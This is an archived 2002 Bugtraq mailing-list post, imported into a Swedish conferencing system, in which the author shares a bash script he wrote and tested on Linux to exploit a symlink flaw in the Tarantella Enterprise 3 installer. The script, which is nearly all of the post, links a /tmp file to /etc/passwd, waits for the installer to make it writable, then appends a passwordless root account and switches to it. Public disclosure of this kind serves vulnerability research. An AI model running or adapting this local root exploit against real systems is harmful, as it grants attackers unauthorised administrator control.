8056500 2002-02-24 08:59 -0500 /36 rader/ Larry W. Cashdollar <lwc@vapid.dhs.org>
Sänt av: joel@lysator.liu.se
Importerad: 2002-02-26 01:31 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Extern kopiemottagare: vuldb@securityfocus.com
Mottagare: Bugtraq (import) <21133>
Ärende: Exploit for Tarantella Enterprise installation (bid 4115)
------------------------------------------------------------
From: "Larry W. Cashdollar" <lwc@vapid.dhs.org>
To: <bugtraq@securityfocus.com>
Cc: <vuldb@securityfocus.com>
Message-ID: <20020224085517.C9867-100000@vapid.dhs.org>
Had some idle time and wrote this, tested under Linux.
#!/bin/bash
#Larry W. Cashdollar lwc@vapid.dhs.org
#http://vapid.dhs.org
#Tarantella Enterprise 3 symlink local root Installation exploit
#For educational purposes only.
#tested on Linux. run and wait.
echo "Creating symlink."
/bin/ln -s /etc/passwd /tmp/spinning
echo "Waiting for tarantella installation."
while true
do
echo -n .
if [ -w /etc/passwd ]
then
echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
su - tarexp
exit
fi
done
(8056500) /Larry W. Cashdollar <lwc@vapid.dhs.org>/-